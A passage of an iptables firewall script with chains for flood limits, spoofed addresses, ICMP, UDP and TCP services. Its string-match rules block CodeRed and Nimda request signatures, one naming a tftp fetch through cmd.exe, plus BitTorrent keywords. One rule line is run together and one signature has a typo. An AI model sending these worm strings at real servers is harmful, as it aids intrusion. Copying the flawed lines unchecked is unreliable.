$IPTABLES -A FLOODS -p tcp -m recent --name blacklist_180 --set -m comment --comment "fp=Blacklist TCP 180 a=DROP" -j DROP
#iptables -A ssh -m recent --update --name blacklist --seconds 600 --hitcount 1 -j DROP
#
#
#------------------------------------------
#
# Limit UDP rate to 10/sec with burst at 20 (sometimes it is not enough, if you know a better average rate, let me know!)
# 3 minutes ban for flooders
#
$IPTABLES -A FLOODS -p udp -m limit --limit 10/s --limit-burst 20 -m comment --comment "fp=Limit UDP rate" -j RETURN
$IPTABLES -A FLOODS -p udp -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix "fp=UDP Flood:1 a=DROP"
$IPTABLES -A FLOODS -p udp -m recent --name blacklist_180 --set -m comment --comment "fp=Blacklist UDP 180 a=DROP" -j DROP
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A FLOODS -j RETURN
#
#
fi
#
#
#*********************************************************
# Create a chain to filter known Viruses
#
#
if [ $BLOCK_VIRUSES -eq 1 ]
then
# One of the most powerful netfilter patches allows you to match
# packets based on their content.
#
# Use the experimental string-matching patch to filter out packets
# that match a certain string.
#
#
#------------------------------------------
# DROP HTTP packets related to CodeRed and Nimda viruses silently
#
#$IPTABLES -A VIRUS -t filter -p tcp -i $INET_IFACE -d $LOCAL_IP --dport 80 -m string --string "/default.ida?" --algo $STRING_ALGO -j DROP
#$IPTABLES -A VIRUS -t filter -p tcp -i $INET_IFACE -d $LOCAL_IP --dport 80 -m string --string ".exe?/c+dir" --algo $STRING_ALGO -j DROP
#$IPTABLES -A VIRUS -t filter -p tcp -i $INET_IFACE -d $LOCAL_IP --dport 80 -m string --string ".exe?/c+tftp" --algo $STRING_ALGO -j DROP
#
#
#------------------------------------------
# If you port forward your HTTP requests to an internal host,
# filter out the CodeRed virus in the FORWARD chain with this rule:
#
#$IPTABLES -A FORWARD -t filter -p tcp --dport 80 -m string --string "/default.ida?" --algo $STRING_ALGO -j DROP
#
#
#------------------------------------------
# Torrent ALGO Strings using Boyer-Moore
#
$IPTABLES -A VIRUS -t filter -m string --algo bm --string "BitTorrent" -j DROP
$IPTABLES -A VIRUS -t filter -m string --algo bm --string "BitTorrent protocol" -j DROP
$IPTABLES -A VIRUS -t filter -m string --algo bm --string "peer_id=" -j DROP
$IPTABLES -A VIRUS -t filter -m string --algo bm --string ".torrent" -j DROP
$IPTABLES -A VIRUS -t filter -m string --algo bm --string "announce.php?passkey=" -j DROP
$IPTABLES -A VIRUS -t filter -m string --algo bm --string "torrent" -j DROP
$IPTABLES -A VIRUS -t filter -m string --algo bm --string "announce" -j DROP
$IPTABLES -A VIRUS -t filter -m string --algo bm --string "info_hash" -j DROP
$IPTABLES -A VIRUS -t filter -m string --algo bm --string "/default.ida?" -j DROP
$IPTABLES -A VIRUS -t filter -m string --algo bm --string ".exe?/c+dir" -j DROP
$IPTABLES -A VIRUS -t filter -m string --algo bm --string ".exe?/c_tftp" -j DROP
#
# Torrent Keys
#
$IPTABLES -A VIRUS -t filter -m string --string "peer_id" --algo kmp -j DROP
$IPTABLES -A VIRUS -t filter -m string --string "BitTorrent" --algo kmp -j DROP
$IPTABLES -A VIRUS -t filter -m string --string "BitTorrent protocol" --algo kmp -j DROP
$IPTABLES -A VIRUS -t filter -m string --string "bittorrent-announce" --algo kmp -j DROP
$IPTABLES -A VIRUS -t filter -m string --string "announce.php?passkey=" --algo kmp -j DROP
#
# Distributed Hash Table (DHT) Keywords
#
$IPTABLES -A VIRUS -t filter -m string --string "find_node" --algo kmp -j DROP
$IPTABLES -A VIRUS -t filter -m string --string "info_hash" --algo kmp -j DROP
$IPTABLES -A VIRUS -t filter -m string --string "get_peers" --algo kmp -j DROP
$IPTABLES -A VIRUS -t filter -m string --string "announce" --algo kmp -j DROP
$IPTABLES -A VIRUS -t filter -m string --string "announce_peers" --algo kmp -j DROP
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A VIRUS -j RETURN
#
#
fi
#
#
#*********************************************************
# Create a chain to filter PRIVATE ADDRESS packets
# This chain is for inbound (from the Internet) private packets only.
#
#
#------------------------------------------
# Drop packets from private address ranges coming in on the external
# Drop multicast adresses
#
$IPTABLES -A PRIVATE_PACKETS -s 0.0.0.0/8 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:0 a=DROP "
$IPTABLES -A PRIVATE_PACKETS -s 0.0.0.0/8 -j DROP
#
$IPTABLES -A PRIVATE_PACKETS -s 10.0.0.0/8 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:A a=DROP "
$IPTABLES -A PRIVATE_PACKETS -s 10.0.0.0/8 -j DROP
#
$IPTABLES -A PRIVATE_PACKETS -s 169.254.0.0/16 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:169 a=DROP "
$IPTABLES -A PRIVATE_PACKETS -s 169.254.0.0/16 -j DROP
#$IPTABLES -A PRIVATE_PACKETS -s 127.0.0.0/8 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:127 a=DROP "
#$IPTABLES -A PRIVATE_PACKETS -s 127.0.0.0/8 -j DROP
#
$IPTABLES -A PRIVATE_PACKETS -s 172.16.0.0/12 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:B a=DROP "$IPTABLES -A PRIVATE_PACKETS -s 172.16.0.0/12 -j DROP
#
#$IPTABLES -A PRIVATE_PACKETS -s 192.16.0.0/16 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:C a=DROP "
#$IPTABLES -A PRIVATE_PACKETS -s 192.0.0.0/24 -j DROP
#
$IPTABLES -A PRIVATE_PACKETS -s 224.0.0.0/4 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:D a=DROP "
$IPTABLES -A PRIVATE_PACKETS -s 224.0.0.0/4 -j DROP
#
#
$IPTABLES -A PRIVATE_PACKETS -s 239.255.255.0/24 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:239 a=DROP "
$IPTABLES -A PRIVATE_PACKETS -s 239.255.255.0/24 -j DROP
#
$IPTABLES -A PRIVATE_PACKETS -s 240.0.0.0/5 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:240 a=DROP "
$IPTABLES -A PRIVATE_PACKETS -s 240.0.0.0/5 -j DROP
#
$IPTABLES -A PRIVATE_PACKETS -s 248.0.0.0/5 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:248 a=DROP "
$IPTABLES -A PRIVATE_PACKETS -s 248.0.0.0/5 -j DROP
#
$IPTABLES -A PRIVATE_PACKETS -s 255.255.255.255/32 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:255 a=DROP "
$IPTABLES -A PRIVATE_PACKETS -s 255.255.255.255/32 -j DROP
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A PRIVATE_PACKETS -j RETURN
#
#
#*********************************************************
# Create a chain to filter incoming ICMP packets
# This chain is for inbound (from the Internet) icmp packets only.
#
# For more info on ICMP types.
#
# http://www.iana.org/assignments/icmp-parameters/icmp-parameters.xml
# iptables -p icmp -h
#
# Type 0 is for echo-reply
# Type 1 is Unassigned
# Type 2 is Unassigned
# Type 3 is for destination-unreachable
# Type 4 is for source quench (depreciated)
# Type 5 is for redirect
# Type 6 is for alternative host address
# Type 7 is Unassigned
# Type 8 is for echo-request.
# Type 9 is for router advertisement
# Type 10 is for router solicitation
# Type 11 is for time-exceeded
# Type 12 is for parameter problem
# Type 13 is for timestamp
# Type 14 is for timestamp-reply
# Type 15 is for information-request
# Type 16 is for information-reply
# Type 17 is for address-mask-request
# Type 18 is for address-mask-reply
# Type 19 is reserved (for security)
# Type 30 is for traceroute
# Type 31 is for datagram conversion error
# Type 32 is for mobile host redirect
# Type 33 is for IPv6 where-are you
# Type 34 is for IPv6 I-am-here
# Type 35 is for mobile registration request
# Type 36 is for mobile registration reply
# Type 37 is for domain name request
# Type 38 is for domain name reply
# Type 39 is for SKIP
# Type 40 is for Photunis
# Type 41 is for ICMP messages utilized by experimental mobility protocols such as Seamoby
#
#
#--reject-with icmp-port-unreachable
#--reject-with icmp6-port-unreachable
#
#
#------------------------------------------
# Destination unreachable
#
# ICMP type 3 is necessary for path MTU discovery to work correctly.
# It should be enabled inbound to get top efficiency.
#
$IPTABLES -A ICMP_IN -p icmp --icmp-type destination-unreachable -j ACCEPT
#
#
#------------------------------------------
# Drop Smurf attack
#
$IPTABLES -A ICMP_IN -p icmp -d 0.0.0.255/0.0.0.255 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:0.255 a=DROP "
$IPTABLES -A ICMP_IN -p icmp -d 0.0.0.255/0.0.0.255 -j DROP
#
#
#------------------------------------------
# Answer ping requests.
#
# First Block DOS - Ping of Death
#
$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m length --length 61:65535 -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:PING-death a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m length --length 61:65535 -j DROP
#
# Now Block DDOS - Smurf
#
$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m pkttype --pkt-type broadcast -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:Smurf:1 a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m pkttype --pkt-type broadcast -j DROP
#
# Ping Flood protection. Accept $LIMIT_PING echo-reply/sec, rest will be logged/dropped.
# Ping Flood protection. Accept $LIMIT_PING echo-requests/sec, rest will be logged/dropped.
#
if [ $ALLOW_PING_IN -eq 1 ]
then
$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-reply -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j ACCEPT
fi
$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-reply -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:PING:1 a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-reply -j DROP
#
if [ $ALLOW_PING_IN -eq 1 ]
then
$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j ACCEPT
#$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m limit --limit 3/s -j ACCEPT # Smurf
fi
$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:PING:2 a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -j DROP
#
#
#------------------------------------------
# Allow traceroute, though it is not required.
#
# Type 11 (Time Exceeded) is the only one accepted that would
# not already be covered by the established connection rule.
# Applied to INPUT on the external interface.
#
# Ping Flood protection. Accept $LIMIT_PING request/sec, rest will be logged/dropped.
#
if [ $ALLOW_TRACEROUTE_IN -eq 1 ]
then
$IPTABLES -A ICMP_IN -p icmp --icmp-type 11 -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j ACCEPT
fi
$IPTABLES -A ICMP_IN -p icmp --icmp-type 11 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:time:1 a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type 11 -j DROP
#
if [ $ALLOW_TRACEROUTE_IN -eq 1 ]
then
$IPTABLES -A ICMP_IN -p icmp --icmp-type 30 -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j ACCEPT
fi
$IPTABLES -A ICMP_IN -p icmp --icmp-type 30 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:trace a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type 30 -j DROP
#
#
#------------------------------------------
# Block ICMP-Parameter-Problem
#
# Ping Flood protection. Accept $LIMIT_PING request/sec, rest will be logged/dropped.
#
if [ $ALLOW_ICMP_PARAM_PROBLEM_IN -eq 1 ]
then
$IPTABLES -A ICMP_IN -p icmp --icmp-type parameter-problem -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j ACCEPT
fi
$IPTABLES -A ICMP_IN -p icmp --icmp-type parameter-problem -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:params a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type parameter-problem -j DROP
#
#
#------------------------------------------
# Block ICMP-Redirects (Should already be caught by sysctl-options, if enabled)
#
#
$IPTABLES -A ICMP_IN -p icmp --icmp-type redirect -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:redirect a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type redirect -j DROP
#
#
#------------------------------------------
# Block ICMP-TTL-Expired MS Traceroute (MS uses ICMP instead of UDP for tracert)
#
$IPTABLES -A ICMP_IN -p icmp --icmp-type ttl-zero-during-transit -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:ttl:1 a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type ttl-zero-during-transit -j DROP
$IPTABLES -A ICMP_IN -p icmp --icmp-type ttl-zero-during-reassembly -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:ttl:2 a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type ttl-zero-during-reassembly -j DROP
#
#
#------------------------------------------
# Block ICMP-Timestamp (Should already be caught by sysctl-options, if enabled)
#
$IPTABLES -A ICMP_IN -p icmp --icmp-type timestamp-request -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:ts:1 a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type timestamp-request -j DROP
$IPTABLES -A ICMP_IN -p icmp --icmp-type timestamp-reply -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:ts:2 a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type timestamp-reply -j DROP
#
#
#------------------------------------------
# Block ICMP-address-mask (can help to prevent OS-fingerprinting)
#
$IPTABLES -A ICMP_IN -p icmp --icmp-type address-mask-request -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:addr:1 a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type address-mask-request -j DROP
$IPTABLES -A ICMP_IN -p icmp --icmp-type address-mask-reply -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:addr:2 a=DROP "
$IPTABLES -A ICMP_IN -p icmp --icmp-type address-mask-reply -j DROP
#
#
#------------------------------------------
# Block DOS - Jolt
#
#
# ICMP packets should fit in a Layer 2 frame, thus they should
# never be fragmented. Fragmented ICMP packets are a typical sign
# of a denial of service attack.
#
$IPTABLES -A ICMP_IN -p icmp --fragment -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP:frag a=DROP "
$IPTABLES -A ICMP_IN -p icmp --fragment -j DROP
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A ICMP_IN -p icmp -j DROP
#
#
#*********************************************************
# Create a chain to filter outgoing ICMP packets
# This chain is for outbound (to the Internet) icmp packets only.
#
#
#------------------------------------------
# Answer ping requests.
#
# Ping Flood protection. Accept $LIMIT_PING echo-reply/sec, rest will be logged/dropped.
# Ping Flood protection. Accept $LIMIT_PING echo-requests/sec, rest will be logged/dropped.
#
if [ $ALLOW_PING_OUT -eq 1 ]
then
$IPTABLES -A ICMP_OUT -p icmp --icmp-type echo-reply -m conntrack --ctstate NEW -j ACCEPT
else
$IPTABLES -A ICMP_OUT -p icmp --icmp-type echo-reply -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:PING:1 a=DROP "
$IPTABLES -A ICMP_OUT -p icmp --icmp-type echo-reply -j DROP
fi
#
if [ $ALLOW_PING_OUT -eq 1 ]
then
$IPTABLES -A ICMP_OUT -p icmp --icmp-type echo-request -m conntrack --ctstate NEW -j ACCEPT
else
$IPTABLES -A ICMP_OUT -p icmp --icmp-type echo-request -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:PING:2 a=DROP "
$IPTABLES -A ICMP_OUT -p icmp --icmp-type echo-request -j DROP
fi
#
#
#------------------------------------------
# Time Exceeded
# Type 11 (Time Exceeded) is the only one accepted that would
# not already be covered by the established connection rule.
# Applied to INPUT on the external interface.
#
if [ $ALLOW_TRACEROUTE_OUT -eq 1 ]
then
$IPTABLES -A ICMP_OUT -p icmp --icmp-type 11 -j ACCEPT
else
$IPTABLES -A ICMP_OUT -p icmp --icmp-type 11 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:time:1 a=DROP "
$IPTABLES -A ICMP_OUT -p icmp --icmp-type 11 -j DROP
fi
#
if [ $ALLOW_TRACEROUTE_OUT -eq 1 ]
then
$IPTABLES -A ICMP_OUT -p icmp --icmp-type 30 -j ACCEPT
else
$IPTABLES -A ICMP_OUT -p icmp --icmp-type 30 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:trace a=DROP "
$IPTABLES -A ICMP_OUT -p icmp --icmp-type 30 -j DROP
fi
#
#------------------------------------------
# Block ICMP-Redirects (Should already be caught by sysctl-options, if enabled)
#
$IPTABLES -A ICMP_OUT -p icmp --icmp-type redirect -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:redirect a=DROP "
$IPTABLES -A ICMP_OUT -p icmp --icmp-type redirect -j DROP
#
#
#------------------------------------------
# Block ICMP-TTL-Expired MS Traceroute (MS uses ICMP instead of UDP for tracert)
#
$IPTABLES -A ICMP_OUT -p icmp --icmp-type ttl-zero-during-transit -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:ttl:1 a=DROP "
$IPTABLES -A ICMP_OUT -p icmp --icmp-type ttl-zero-during-transit -j DROP
$IPTABLES -A ICMP_OUT -p icmp --icmp-type ttl-zero-during-reassembly -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:ttl:2 a=DROP "
$IPTABLES -A ICMP_OUT -p icmp --icmp-type ttl-zero-during-reassembly -j DROP
#
#
#------------------------------------------
# Block ICMP-Parameter-Problem
#
$IPTABLES -A ICMP_OUT -p icmp --icmp-type parameter-problem -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:params a=DROP "
$IPTABLES -A ICMP_OUT -p icmp --icmp-type parameter-problem -j DROP
#
#
#------------------------------------------
# Block ICMP-Timestamp (Should already be caught by sysctl-options, if enabled)
#
$IPTABLES -A ICMP_OUT -p icmp --icmp-type timestamp-request -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:ts:1 a=DROP "
$IPTABLES -A ICMP_OUT -p icmp --icmp-type timestamp-request -j DROP
$IPTABLES -A ICMP_OUT -p icmp --icmp-type timestamp-reply -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:ts:2 a=DROP "
$IPTABLES -A ICMP_OUT -p icmp --icmp-type timestamp-reply -j DROP
#
#
#------------------------------------------
# Block ICMP-address-mask (can help to prevent OS-fingerprinting)
#
$IPTABLES -A ICMP_OUT -p icmp --icmp-type address-mask-request -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:addr:1 a=DROP "
$IPTABLES -A ICMP_OUT -p icmp --icmp-type address-mask-request -j DROP
$IPTABLES -A ICMP_OUT -p icmp --icmp-type address-mask-reply -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:addr:2 a=DROP "
$IPTABLES -A ICMP_OUT -p icmp --icmp-type address-mask-reply -j DROP
#
#
#------------------------------------------
# ICMP packets should fit in a Layer 2 frame, thus they should
# never be fragmented. Fragmented ICMP packets are a typical sign
# of a denial of service attack.
#
$IPTABLES -A ICMP_OUT -p icmp --fragment -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-OUT:frag a=DROP "
$IPTABLES -A ICMP_OUT -p icmp --fragment -j DROP
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A ICMP_OUT -p icmp -j DROP
#
#
#*********************************************************
# Create a chain to filter UDP packets
# Applied to INPUT on the external or Internet interface.
#
#
#------------------------------------------
# Dynamic Address
#
# If DHCP, the initial request is a broadcast. The response
# doesn't exactly match the outbound packet. This explicitly
# allow the DHCP ports to alleviate this problem.
#
# If you receive your dynamic address by a different means, you
# can probably comment this line.
#
if [ $ALLOW_DHCP_BROADCAST_IN -eq 1 ]
then
$IPTABLES -A UDP_IN -p udp --sport 68 --dport 67 -j ACCEPT
fi
#
#
#------------------------------------------
# Allow certain stuff
#
if [ $ALLOW_CUPS_IN -eq 1 ]
then
$IPTABLES -A UDP_IN -p udp -m conntrack --ctstate NEW --dport 631 -j ACCEPT # Printing CUPS
fi
#
# Allow DNS
#
if [ $ALLOW_DNS_IN -eq 1 ]
then
$IPTABLES -A UDP_IN -p udp -m conntrack --ctstate NEW --dport 53 -j ACCEPT
fi
#
#
#
# Allow NFS
#
if [ $ALLOW_NFS_IN -eq 1 ]
then
$IPTABLES -A UDP_IN -p udp -m conntrack --ctstate NEW --dport 2049 -j ACCEPT # http
fi
#
#
# Allow NTP
#
if [ $DO_QUICK_NTP -ne 0 ]
then
if [ $ALLOW_NTP_IN -eq 1 ]
then
$IPTABLES -A UDP_IN -p udp -m conntrack --ctstate NEW --dport 123 -j ACCEPT
fi
fi
#
# Allow TRACEROUTE
#
if [ $ALLOW_TRACEROUTE_OUT -eq 1 ]
then
$IPTABLES -A UDP_IN -p udp -m conntrack --ctstate NEW --sport $PORTS_TRACEROUTE_SRC --dport $PORTS_TRACEROUTE_DEST -j ACCEPT
fi
#
#
#------------------------------------------
# Don't log route packets coming from routers - too much logging
#
$IPTABLES -A UDP_IN -p udp --dport 520 -m conntrack --ctstate NEW -j DROP
#
#
#------------------------------------------
# Block DDOS - Fraggle
#
$IPTABLES -A UDP_IN -p udp -m pkttype --pkt-type broadcast -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=UDP-IN:Fraggle a=DROP "
$IPTABLES -A UDP_IN -p udp -m pkttype --pkt-type broadcast -j DROP
#
#
#------------------------------------------
# Block DOS - Teardrop
#
$IPTABLES -A UDP_IN -p udp --fragment -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=UDP-IN:Teardrop a=DROP "
$IPTABLES -A UDP_IN -p udp --fragment -j DROP
#
#
#------------------------------------------
# Port 0 fingerprint attempt
#
$IPTABLES -A UDP_IN -p udp --dport 0 -m limit --limit 1/h --limit-burst 1 -j LOG --log-level $LOG_LEVEL --log-prefix "fp=UDP-IN:finger:0 a=DROP "
$IPTABLES -A UDP_IN -p udp --dport 0 -j DROP
#
#
#------------------------------------------
# Drop the rwho port (513 udp)
#
$IPTABLES -A UDP_IN -p udp ! -i lo --destination-port 513 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=UDP-IN:rwho a=DROP "
$IPTABLES -A UDP_IN -p udp ! -i lo --destination-port 513 -m comment --comment "Block rwho port" -j DROP
#
#
#------------------------------------------
# Separate logging of special portscans/connection attempts
#
# Port Scanners
#
if [ $DO_LOG_SCANS -eq 1 ]
then
$IPTABLES -A UDP_IN -i $INET_IFACE -j SCANS
fi
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A UDP_IN -p udp -j RETURN
#
#
#*********************************************************
# Create a chain to filter outgoing UDP packets
# This chain is for outbound (to the Internet) udp packets only.
#
#
#------------------------------------------
#
# Allow printing using CUPS
#
if [ $ALLOW_CUPS_OUT -eq 1 ]
then
$IPTABLES -A UDP_OUT -p udp --dport 631 -m conntrack --ctstate NEW -j ACCEPT # Printing CUPS
fi
#
# Allow DNS
#
if [ $ALLOW_DNS_OUT -eq 1 ]
then
$IPTABLES -A UDP_OUT -p udp --dport 53 -m conntrack --ctstate NEW -j ACCEPT # DNS
fi
#
#
# Allow NTP Time to setup the Date/Time from NTP Server
#
if [ $ALLOW_NTP_OUT -eq 1 ]
then
$IPTABLES -A UDP_OUT -p udp --dport 123 -m conntrack --ctstate NEW -j ACCEPT
fi
#
#
# Allow TRACEROUTE
#
if [ $ALLOW_TRACEROUTE_OUT -eq 1 ]
then
$IPTABLES -A UDP_OUT -p udp --sport $PORTS_TRACEROUTE_SRC --dport $PORTS_TRACEROUTE_DEST -m conntrack --ctstate NEW -j ACCEPT
fi
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A UDP_OUT -p udp -j RETURN
#
#
#*********************************************************
# Create a chain to filter incoming TCP packets
# Applied to INPUT on the external or Internet interface.
#
#
#------------------------------------------
# Ident - Silently reject Ident
# Dont DROP ident, because of possible delays when establishing an outbound connection
#
#$IPTABLES -A TCP_IN -p tcp -m tcp --dport 113 -j REJECT --reject-with tcp-reset
$IPTABLES -A TCP_IN -p tcp --dport 113 -j REJECT --reject-with icmp-port-unreachable
#
#
#------------------------------------------
if [ $ALLOW_DHCP_BROADCAST_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp --sport 68 --dport 67 -j ACCEPT
fi
#
#
#------------------------------------------
# Public services running ON Server:
#
# Allow printing using CUPS
#
if [ $ALLOW_CUPS_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 631 -j ACCEPT # Printing CUPS
fi
#
# Allow DNS
#
if [ $ALLOW_DNS_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 53 -j ACCEPT # DNS
fi
#
# Allow FTP
#
if [ $ALLOW_FTP_IN -eq 1 ]
then
# When you attempt to use ftp on these settings, it stops when enter the PASV
# mode. At PASV mode, after establish the connection with port 21, client
# appoints >1024 port so that this becomes new connection and is rejected.
# You need to have been loaded ip_conntrack_ftp module to use ftp in PASV mode.
# Add one line above ip_conntrack ip_conntrack_ftp to /etc/modules.conf then
# it is loaded at boot up and ftp will be possible to use.
#
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 20 -j ACCEPT # ftp-data
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 21 -j ACCEPT # ftp
fi
#
# Allow HTTP
#
if [ $ALLOW_HTTP_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 80 -j ACCEPT # http
fi
#
# Allow HTTPS
#
if [ $ALLOW_HTTPS_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 443 -j ACCEPT # https
fi
#
# Allow IMAP
#
if [ $ALLOW_IMAP_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 143 -j ACCEPT # imap
fi
#
# Allow MySQL
#
if [ $ALLOW_MYSQL_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 3306 -j ACCEPT # MySQL
fi
#
# Allow NFS
#
